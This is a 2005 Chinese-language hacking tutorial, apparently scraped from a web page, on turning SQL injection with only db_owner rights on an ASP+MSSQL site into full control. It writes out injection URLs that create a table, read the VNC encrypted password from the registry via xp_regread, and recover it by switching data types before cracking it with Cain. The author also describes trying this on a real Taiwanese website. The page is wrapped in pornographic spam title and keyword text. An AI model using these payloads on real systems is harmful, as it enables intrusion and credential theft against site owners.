国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

MSSQL db_owner角色注入直接獲得系統權限
2005-12-17   

相信大家對ASP+MSSQL注入都已經很熟悉了,連一個對SQL語法絲毫不懂的人也可以用NBSI來輕松入侵大量網站。但就算是一個SQL INJECTION高手,如果針對在MSSQL中只有db_owner角色,破不出猜不到網站后臺的情況下,好像也無技可施;除了用備份得到shell的這個思路,我在網上實在沒有找出更好的入侵辦法。不過,備份得到的shell只是理論化的東東,如果一個webshell有20mb的話,你還能用它嗎?前不久,我就碰到了這樣的一個臺灣網站,管理員的密碼倒是用NBSi跑了出來,可是用戶名因為是繁體的原因在NBSi中成了一堆亂碼。我也找到了后臺,可只有干瞪眼的份。怎么辦?我又掃了它的所有端口,發現開了5900,估計是管理員用了VNC對服務器進行了遠程控制。這時,我就有一個思路,能不能把 VNC在注冊表的加密密碼讀出來再來破解呢?看我表演吧!
TELNET服務器的5900端口,得到訊息證實服務器的確用的是VNC。
相信大家都會用讀xp_regread來讀注冊表了,依次提交如下語句:
http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][char](255));
這樣我們就成功地建了一個名為cyfd的表,并且添加了類型是char,長度為255的字段名gyfd。然后向表中加數據:
_blank>http://www.something.com/script.asp?id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
從注冊表中讀出VNC在注冊表的加密密碼的值,再把值插入到剛建的表中。然后暴出VNC在注冊表的加密密碼:
_blank>http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd > 1)。
可是結果大失我所望,gyfd的值是空的。如果這樣容易的話,不會有這篇文章出現了。這是什么原因呢?我的語法不正確?翻來覆去的檢查我的語句也沒有發現錯誤呀。難道繁體的vnc在注冊表里的位置不一樣?后來我又開始在本機裝了vnc又在分析查循器里做測試,得到的結果卻是個數字5。這時czy上線了,詢問了一下,他勸我把gyfd的這個字段改成二進制數據類型 binary來試一下。于是我又在本機測試了一下,依次提交如下語句:
 http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][binary](20));
http://127.0.0.1/script.asp?id=2;DECLARE @result binary(20) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后我再用nbsi跑出cyfd表里gyfd這個字段的值。結果到是出來了,得到了vnc的加密密碼值是 0x0E3515AC00000000000000000000000000000000。可這兒還不對,我在本機裝的vnc在注冊表里的密碼值是 hex:0e,35,15,ac,00,62,d3,08這個呀。原來binary(n)的數據存儲長度是固定的,當輸入的二進制長度小于n時,余下長度填0補充。我在注入語句中寫入的binary(20)是足夠寫入vnc加密密碼的長度時,為什么還有那么多0來填充呢?這是因為正好我的vnc密碼是 0e3515ac0062d308,在碰到了00的情況下,xp_regread以為已經讀完了它的值呢,把00當成了結束符,所以只讀到了 0x0E3515AC,我暈!
翻了一下書,終于讓我找到了一個特殊的數據類型uniqueidentifier,是用來存儲一個16字節長的二進制數據類型。把注入語句改造一下:
 http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][uniqueidentifier]);
 http://127.0.0.1/script.asp?id=2;DECLARE @result uniqueidentifier EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后再用nbsi跑一下,跑出來了,不過得到的結果是AC15350E-6200-08D3-0000-000000000000。
AC15350E-6200-08D3-0000-000000000000和我在注冊表里的正確的vnc密碼的值0e3515ac0062d308 相比,能看出來有什么不同嗎?只不過順序是顛倒的,相信大家都會小學的算術,這個不用我教了。試一下用cain破出vnc的密碼,看看行不行。
看樣子在本機做的測試一切成功。這方法用到臺灣上的站點試試,哎,依然沒有跑出vnc的密碼,也許繁體vnc在注冊表的位置不同吧。不過,我研究了一上午,有了一點收獲,就放過你吧。

熱詞搜索:

上一篇:phparticle 2.0注入漏洞測試分析
下一篇:標準SQL注入入侵語句

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲高清视频在线| 在线观看av一区| 亚洲手机成人高清视频| 国产欧美精品一区二区色综合朱莉| 99久久精品国产毛片| 蜜臀久久99精品久久久久久9| 国产成人鲁色资源国产91色综| 欧美影视一区在线| 久久久久久久久久电影| 亚洲不卡av一区二区三区| 国产成人精品aa毛片| 制服丝袜激情欧洲亚洲| 亚洲欧洲韩国日本视频| 国产精品综合在线视频| 欧美一区二区三区日韩| 亚洲成人黄色影院| 91色乱码一区二区三区| 中文字幕av一区 二区| 国产在线乱码一区二区三区| 欧美高清一级片在线| 亚洲伦在线观看| 成人午夜私人影院| 久久精品人人做人人爽人人| 久久福利视频一区二区| 欧美日韩一本到| 亚洲一级片在线观看| 色哟哟欧美精品| 亚洲视频你懂的| 99精品热视频| 综合电影一区二区三区| 成人av网站在线| 亚洲欧洲无码一区二区三区| 成人中文字幕合集| 国产精品水嫩水嫩| 国产成都精品91一区二区三| 国产欧美日产一区| 成人黄色在线网站| 中文字幕在线不卡一区二区三区| 丁香婷婷综合网| 中文字幕日韩欧美一区二区三区| 成人福利在线看| 1区2区3区国产精品| 91亚洲国产成人精品一区二三| 国产精品毛片久久久久久| 成人动漫一区二区三区| 亚洲欧美偷拍卡通变态| 欧洲在线/亚洲| 视频一区国产视频| 日韩欧美高清dvd碟片| 国产精品一区免费在线观看| 中文字幕 久热精品 视频在线| 成人午夜电影网站| 亚洲摸摸操操av| 欧美丰满一区二区免费视频| 另类小说欧美激情| 国产精品福利一区二区三区| 色狠狠一区二区三区香蕉| 午夜精品免费在线| 久久免费的精品国产v∧| 成人免费毛片a| 亚洲国产综合91精品麻豆| 欧美精品18+| 国产成人精品www牛牛影视| 亚洲精品视频一区二区| 久久精品欧美一区二区三区不卡 | 懂色av中文字幕一区二区三区| 国产精品丝袜在线| 欧美日韩中文精品| 国产福利电影一区二区三区| 亚洲精品日日夜夜| 欧美一三区三区四区免费在线看| 国产精品一二三区在线| 亚洲国产精品尤物yw在线观看| 欧美成人女星排行榜| 色爱区综合激月婷婷| 精品在线播放免费| 一区二区三区波多野结衣在线观看| 日韩欧美国产一区在线观看| 波多野结衣中文字幕一区二区三区| 午夜一区二区三区视频| 国产女人18水真多18精品一级做| 欧美日产在线观看| www.亚洲国产| 韩国av一区二区三区在线观看| 依依成人综合视频| 国产偷国产偷精品高清尤物| 欧美日韩国产综合一区二区| av一区二区三区四区| 激情久久久久久久久久久久久久久久| 亚洲欧洲99久久| 久久久久9999亚洲精品| 欧美一区二区高清| 色综合天天综合网天天狠天天| 精品一二线国产| 日韩av中文字幕一区二区| 亚洲乱码国产乱码精品精的特点 | 亚洲精品视频一区| 中文成人综合网| 久久久久久久久久久久久女国产乱 | 亚洲欧美在线另类| 国产片一区二区三区| 精品国产一区二区在线观看| 在线电影欧美成精品| 欧美视频中文一区二区三区在线观看| 成人高清免费观看| 丁香六月综合激情| 国产伦精品一区二区三区免费迷| 日本va欧美va欧美va精品| 国产精品国产自产拍高清av王其| 亚洲欧美偷拍卡通变态| 欧美性大战久久久久久久蜜臀 | 久久综合九色欧美综合狠狠| 91视频一区二区| 色婷婷精品大在线视频| 亚洲成人在线网站| 亚洲在线免费播放| 亚洲国产视频a| 91女神在线视频| 成人精品免费看| 久久精品二区亚洲w码| 天天操天天干天天综合网| 亚洲一区二区三区国产| 一区二区三区自拍| 亚洲色图.com| 亚洲一区中文日韩| 亚洲午夜私人影院| 日韩精品乱码av一区二区| 日韩高清不卡一区二区| 奇米色777欧美一区二区| 人人精品人人爱| 国产电影精品久久禁18| 成人的网站免费观看| 日本久久电影网| 91精品国模一区二区三区| 欧美mv和日韩mv国产网站| 国产亚洲精品7777| 亚洲免费毛片网站| 日本在线播放一区二区三区| 老司机午夜精品99久久| 国产成人av资源| 在线免费观看成人短视频| 欧美日韩视频第一区| 日韩欧美国产一区在线观看| 国产三级久久久| 欧美国产精品一区二区三区| 麻豆国产欧美日韩综合精品二区| 亚洲激情综合网| 免费高清成人在线| 国产福利精品一区| 在线观看日韩毛片| 欧美精品一区二区久久久| 国产网站一区二区| 亚洲欧洲精品一区二区三区| 三级成人在线视频| 国产在线麻豆精品观看| 丰满少妇在线播放bd日韩电影| av不卡免费电影| 日韩精品中文字幕在线一区| 中文字幕不卡在线播放| 成人av在线网| 国产精品一区免费在线观看| 精品久久一区二区| 91亚洲资源网| 久久综合成人精品亚洲另类欧美| 日韩一区日韩二区| 久久亚洲免费视频| 一区二区三区精密机械公司| 爽爽淫人综合网网站 | 久久久精品免费网站| 国产女同互慰高潮91漫画| 成人黄色网址在线观看| 久久久av毛片精品| 欧美bbbbb| 一本色道**综合亚洲精品蜜桃冫| 色婷婷亚洲综合| 国产色一区二区| 国产一区二区主播在线| 正在播放亚洲一区| 99热在这里有精品免费| heyzo一本久久综合| 色欧美片视频在线观看| 欧美国产日韩一二三区| 天天做天天摸天天爽国产一区| a4yy欧美一区二区三区| 中文在线资源观看网站视频免费不卡| 美女在线视频一区| 日韩一级成人av| 亚洲第一久久影院| 在线免费观看不卡av| 亚洲女同一区二区| 色999日韩国产欧美一区二区| 中文字幕一区二区三区精华液| 国产精品久久久久久久久动漫| 日本高清无吗v一区| 亚洲午夜国产一区99re久久| 欧美日韩国产不卡| 国内外成人在线| 亚洲欧美日韩国产中文在线| 91网上在线视频| 亚洲一区自拍偷拍|